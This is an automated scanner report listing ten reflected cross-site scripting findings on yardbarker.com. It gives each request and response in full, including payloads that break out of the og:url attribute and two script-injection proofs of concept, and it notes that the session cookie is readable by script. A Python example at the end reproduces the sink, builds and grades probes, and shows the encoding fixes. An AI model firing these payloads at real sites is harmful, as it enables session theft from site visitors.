XSS, yardbarker.com, Cross Site Scripting, CWE-79, CAPEC-86

Report generated by XSS.CX at Thu Mar 24 09:27:08 CDT 2011.


1. Cross-site scripting (reflected)

1.1. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 1]

1.2. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 4]

1.3. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 5]

1.4. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 1]

1.5. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 4]

1.6. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 5]

1.7. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [name of an arbitrarily supplied request parameter]

1.8. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [REST URL parameter 1]

1.9. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [REST URL parameter 4]

1.10. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 10 instances of this issue:


1.1. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220

Issue detail

The value of REST URL parameter 1 (the first path segment, the sport section) is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI. The payload b0206"><a>5e44f9623aa was submitted in REST URL parameter 1 and was echoed unmodified in the application's response.

The "><a> sequence arriving intact inside the attribute shows that the attribute can be closed early and new HTML tags injected into the returned document. The scanner's attempt to turn this into a full proof-of-concept for arbitrary JavaScript did not succeed, which is why the finding is graded Firm rather than Certain; the attribute breakout itself is not in doubt. Retest manually to identify any input validation, routing constraint or other obstacle before treating this segment as non-exploitable.

Request

GET /all_sportsb0206"><a>5e44f9623aa/articles/msn/greatest_march_madness_moments_lego_ized/4428220 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "dcd1bed9905d4f8b52d0d516d6bd62b8"
X-Runtime: 75ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=aa1f052de961c4ae3ab7d79037d368e8; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 64377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/all_sportsb0206"><a>5e44f9623aa/articles/msn/greatest_march_madness_moments_lego_ized/4428220"/>
...[SNIP]...

1.2. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220

Issue detail

The value of REST URL parameter 4 (the fourth path segment, the article slug) is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI. The payload dde0a"><a>0b1d368196d was submitted in REST URL parameter 4 and was echoed unmodified in the application's response.

The "><a> sequence arriving intact inside the attribute shows that the attribute can be closed early and new HTML tags injected into the returned document. The scanner's attempt to turn this into a full proof-of-concept for arbitrary JavaScript did not succeed, which is why the finding is graded Firm rather than Certain; the attribute breakout itself is not in doubt. Retest manually to identify any input validation, routing constraint or other obstacle before treating this segment as non-exploitable.

Request

GET /all_sports/articles/msn/greatest_march_madness_moments_lego_izeddde0a"><a>0b1d368196d/4428220 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "97ff1e6db883bc8b1a3b7682ee618bc1"
X-Runtime: 69ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=17bccf840dd90a7dea0df066ede7cb7c; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 64377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_izeddde0a"><a>0b1d368196d/4428220"/>
...[SNIP]...

1.3. http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220

Issue detail

The value of REST URL parameter 5 (the fifth path segment, the numeric article id) is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI. The payload f67b4"><a>a91a8334255 was submitted in REST URL parameter 5 and was echoed unmodified in the application's response.

The "><a> sequence arriving intact inside the attribute shows that the attribute can be closed early and new HTML tags injected into the returned document. The scanner's attempt to turn this into a full proof-of-concept for arbitrary JavaScript did not succeed, which is why the finding is graded Firm rather than Certain; the attribute breakout itself is not in doubt. Retest manually to identify any input validation, routing constraint or other obstacle before treating this segment as non-exploitable.

Request

GET /all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220f67b4"><a>a91a8334255 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:07:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "4a58fc63e41732d708cb6564037ea94b"
X-Runtime: 310ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=c35a893d55020f1e7885ac37e7874cfe; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 64637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220f67b4"><a>a91a8334255"/>
...[SNIP]...

1.4. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/

Issue detail

The value of REST URL parameter 1 (the first path segment, the sport section) is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI. The payload adf19"><a>b90160f6fca was submitted in REST URL parameter 1 and was echoed unmodified in the application's response.

The "><a> sequence arriving intact inside the attribute shows that the attribute can be closed early and new HTML tags injected into the returned document. The scanner's attempt to turn this into a full proof-of-concept for arbitrary JavaScript did not succeed, which is why the finding is graded Firm rather than Certain; the attribute breakout itself is not in doubt. Retest manually to identify any input validation, routing constraint or other obstacle before treating this segment as non-exploitable.

Request

GET /college_footballadf19"><a>b90160f6fca/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "c7d1f92cd8fe11617a24ca77b64cff05"
X-Runtime: 75ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=8512ee152c97084f9fd53a051d7f4328; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 74646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/college_footballadf19"><a>b90160f6fca/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/"/>
...[SNIP]...

1.5. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/

Issue detail

The value of REST URL parameter 4 (the fourth path segment, the article slug) is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI. The payload a444c"><a>7d8afe1c1f5 was submitted in REST URL parameter 4 and was echoed unmodified in the application's response.

The "><a> sequence arriving intact inside the attribute shows that the attribute can be closed early and new HTML tags injected into the returned document. The scanner's attempt to turn this into a full proof-of-concept for arbitrary JavaScript did not succeed, which is why the finding is graded Firm rather than Certain; the attribute breakout itself is not in doubt. Retest manually to identify any input validation, routing constraint or other obstacle before treating this segment as non-exploitable.

Request

GET /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_dolla444c"><a>7d8afe1c1f5/4435397/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "31cae7f782f90b2db6b1e6ef824898bd"
X-Runtime: 77ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=86de013a1f4fe84974af71538cf47fea; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 74646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_dolla444c"><a>7d8afe1c1f5/4435397/"/>
...[SNIP]...

1.6. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/

Issue detail

The value of REST URL parameter 5 (the fifth path segment, the numeric article id) is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI. The payload d93e4"><a>5036e1a289c was submitted in REST URL parameter 5 and was echoed unmodified in the application's response.

The "><a> sequence arriving intact inside the attribute shows that the attribute can be closed early and new HTML tags injected into the returned document. The scanner's attempt to turn this into a full proof-of-concept for arbitrary JavaScript did not succeed, which is why the finding is graded Firm rather than Certain; the attribute breakout itself is not in doubt. Retest manually to identify any input validation, routing constraint or other obstacle before treating this segment as non-exploitable.

Request

GET /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397d93e4"><a>5036e1a289c/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "692bdd77ba648fcbd37729a451666b3b"
X-Runtime: 140ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=3ef6c3fb819bb52d19911b95e1d181a5; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 74646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397d93e4"><a>5036e1a289c/"/>
...[SNIP]...

1.7. http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yardbarker.com
Path:   /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI, query string included. The payload e9be7"><script>alert(1)</script>1c87f9cfc74 was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response: the attribute is closed and a script element opened with no encoding applied, which is why this instance is graded Certain. Script injected here runs in the www.yardbarker.com origin, and the _Yardbarker_session cookie set in this response carries no HttpOnly flag, so it is readable from that script. Note that the attack needs no valid parameter name at all; any query string is reflected.

Request

GET /college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/?e9be7"><script>alert(1)</script>1c87f9cfc74=1 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "361138a65d0d3f82dc6915651a9b8dfb"
X-Runtime: 67ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=905b9fe042a7bb7d3bacd3ab5f8d2b5e; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 74671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/college_football/articles/msn/come_on_barbie_lets_go_party_former_isu_football_player_the_face_of_new_ken_doll/4435397/?e9be7"><script>alert(1)</script>1c87f9cfc74=1"/>
...[SNIP]...

1.8. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/

Issue detail

The value of REST URL parameter 1 (the first path segment, the sport section) is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI. The payload da72b"><a>ff0234e3ef4 was submitted in REST URL parameter 1 and was echoed unmodified in the application's response.

The "><a> sequence arriving intact inside the attribute shows that the attribute can be closed early and new HTML tags injected into the returned document. The scanner's attempt to turn this into a full proof-of-concept for arbitrary JavaScript did not succeed, which is why the finding is graded Firm rather than Certain; the attribute breakout itself is not in doubt. Retest manually to identify any input validation, routing constraint or other obstacle before treating this segment as non-exploitable.

Request

GET /nflda72b"><a>ff0234e3ef4/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "f94d91bc85dd6ef92f12d1ef9b49c464"
X-Runtime: 66ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=8eccf93074ffcb4b3d4e639ced60a1d1; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 122855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/nflda72b"><a>ff0234e3ef4/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/"/>
...[SNIP]...

1.9. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yardbarker.com
Path:   /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/

Issue detail

The value of REST URL parameter 4 (the fourth path segment, the article slug) is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI. The payload cb395"><a>15991f989c5 was submitted in REST URL parameter 4 and was echoed unmodified in the application's response.

The "><a> sequence arriving intact inside the attribute shows that the attribute can be closed early and new HTML tags injected into the returned document. The scanner's attempt to turn this into a full proof-of-concept for arbitrary JavaScript did not succeed, which is why the finding is graded Firm rather than Certain; the attribute breakout itself is not in doubt. Retest manually to identify any input validation, routing constraint or other obstacle before treating this segment as non-exploitable.

Request

GET /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battlecb395"><a>15991f989c5/4433792/ HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "8ebc44f6273a466b8c03baee7b796c8a"
X-Runtime: 66ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=4d0620a01f19b89622fd77418e8f4d41; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 122855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battlecb395"><a>15991f989c5/4433792/"/>
...[SNIP]...

1.10. http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yardbarker.com
Path:   /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the content attribute of the page's <meta property="og:url"> tag, a double-quoted attribute that is built from the raw request URI, query string included. The payload 7b4f6"><script>alert(1)</script>c55825792fc was submitted as the name of an arbitrarily supplied request parameter and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response: the attribute is closed and a script element opened with no encoding applied, which is why this instance is graded Certain. Script injected here runs in the www.yardbarker.com origin, and the _Yardbarker_session cookie set in this response carries no HttpOnly flag, so it is readable from that script. Note that the attack needs no valid parameter name at all; any query string is reflected.

Request

GET /nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/?7b4f6"><script>alert(1)</script>c55825792fc=1 HTTP/1.1
Host: www.yardbarker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.35
Date: Thu, 24 Mar 2011 13:06:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "2dcf6d9d60bb91464dee1fc78c2ead04"
X-Runtime: 81ms
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _Yardbarker_session=a81e5fd55afa1e171ba988ee18260724; domain=yardbarker.com; path=/; expires=Wed, 01 Jan 2020 05:00:00 GMT
Content-Length: 122880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<meta property="og:url" content="http://www.yardbarker.com/nfl/articles/msn/movement_to_re_hang_mike_vicks_jersey_at_his_high_school_sparks_controversy_facebook_battle/4433792/?7b4f6"><script>alert(1)</script>c55825792fc=1"/>
...[SNIP]...
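All ten instances above (1.1 through 1.10) share a single sink: the og:url meta tag is assembled from the origin plus the raw request target, path and query string alike, with no encoding. The following Python is an added example written for this report; it is not Yardbarker's code and not the XSS.CX scanner. It reconstructs that sink as a stand-in function, builds probes of the same shape the report used for both insertion points (the n-th path segment and an arbitrary parameter name), grades the reflection the way the report's Confidence column does, and shows two fixes: encoding at the sink, and building og:url from validated route parameters instead of echoing the request. The route shape in the canonical builder is assumed from the report's paths. The stand-in has no router, so it echoes a script probe placed in a path segment, which the real application did not (those findings stayed at Firm); the last line of the demo shows why a path-segment script probe is worth retesting by hand: the "/" in </script> changes the segment count.

```python
"""Added example: stand-in for the observed og:url sink, the report's probe
shapes, the report's grading, and two fixes. Not Yardbarker's code."""
from __future__ import annotations

import html
import re
import secrets
from typing import Callable, Optional, Union

ORIGIN = "http://www.yardbarker.com"

# --- stand-in for the observed sink ---------------------------------------
def vulnerable_og_url_tag(request_target: str) -> str:
    """What every response in the report shows: origin + raw request target
    (path *and* query string) dropped into a double-quoted attribute as-is."""
    return f'<meta property="og:url" content="{ORIGIN}{request_target}"/>'

# --- fix 1: encode at the sink --------------------------------------------
def escaped_og_url_tag(request_target: str) -> str:
    """HTML-attribute-encode anything derived from the request: '"' becomes
    &quot; and '<' becomes &lt;, so the attribute cannot be closed early."""
    return f'<meta property="og:url" content="{html.escape(ORIGIN + request_target, quote=True)}"/>'

# --- fix 2: do not echo the request at all ---------------------------------
SEGMENT = re.compile(r"[a-z0-9_]+")      # assumed allow-list for slug-like segments
ARTICLE_ID = re.compile(r"[0-9]+")

def canonical_og_url_tag(section: str, source: str, slug: str, article_id: str) -> str:
    """og:url is a canonical URL, so build it from validated route parameters
    (route shape assumed from the report's paths) and drop the query string.
    Still encode: validation may be loosened later, encoding should not be."""
    for part in (section, source, slug):
        if not SEGMENT.fullmatch(part):
            raise ValueError(f"bad path segment: {part!r}")
    if not ARTICLE_ID.fullmatch(article_id):
        raise ValueError(f"bad article id: {article_id!r}")
    url = f"{ORIGIN}/{section}/articles/{source}/{slug}/{article_id}/"
    return f'<meta property="og:url" content="{html.escape(url, quote=True)}"/>'

# --- probe construction, matching the report's two insertion points --------
MARKERS = {"tag": '"><a>', "script": '"><script>alert(1)</script>'}

def make_probe(kind: str) -> str:
    """5 random hex chars + marker + 11 random hex chars, the shape seen in
    the report (e.g. b0206"><a>5e44f9623aa)."""
    return secrets.token_hex(3)[:5] + MARKERS[kind] + secrets.token_hex(6)[:11]

def inject_into_rest_segment(path: str, n: int, payload: str) -> str:
    """'REST URL parameter n' = the n-th path segment, 1-based, with the
    payload appended to the segment's existing value (as in the requests)."""
    parts = path.split("/")          # parts[0] == '' for an absolute path
    if n < 1 or n >= len(parts) or parts[n] == "":
        raise IndexError(f"path has no segment {n}")
    parts[n] += payload
    return "/".join(parts)

def inject_as_param_name(path: str, payload: str) -> str:
    """'Name of an arbitrarily supplied request parameter' = ?<payload>=1."""
    return f"{path}?{payload}=1"

# --- grading, as the report's Confidence column does ----------------------
def classify_reflection(body: str, probe: str) -> Optional[str]:
    """'Certain': a probe carrying <script> came back byte-for-byte.
    'Firm': a tag-only probe came back byte-for-byte, so the attribute can be
    closed and a new element opened, but script execution is not yet shown.
    None: the probe was encoded or not reflected."""
    if probe not in body:
        return None
    return "Certain" if "<script>" in probe else "Firm"

Location = Union[int, str]   # segment number, or "param-name"

def probe_location(render: Callable[[str], str], path: str,
                   where: Location, kind: str = "tag") -> Optional[str]:
    """Send one probe through `render` (a page-rendering stand-in) and grade it."""
    probe = make_probe(kind)
    if where == "param-name":
        target = inject_as_param_name(path, probe)
    else:
        target = inject_into_rest_segment(path, int(where), probe)
    return classify_reflection(render(target), probe)

if __name__ == "__main__":
    path = "/all_sports/articles/msn/greatest_march_madness_moments_lego_ized/4428220"
    for where in (1, 4, 5, "param-name"):
        for kind in ("tag", "script"):
            print(where, kind,
                  "vulnerable:", probe_location(vulnerable_og_url_tag, path, where, kind),
                  "escaped:", probe_location(escaped_og_url_tag, path, where, kind))
    print(canonical_og_url_tag("all_sports", "msn",
                               "greatest_march_madness_moments_lego_ized", "4428220"))
    # A script probe in a path segment carries the '/' of </script>, so the
    # segment count changes; check this first when retesting the Firm findings.
    print("segments:", inject_into_rest_segment(path, 1, MARKERS["script"]).count("/"),
          "vs", path.count("/"))
```

The grading is deliberately literal: a Firm result means the attribute breakout is proven, not that the issue is lower risk, and the fix is the same for all ten instances.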
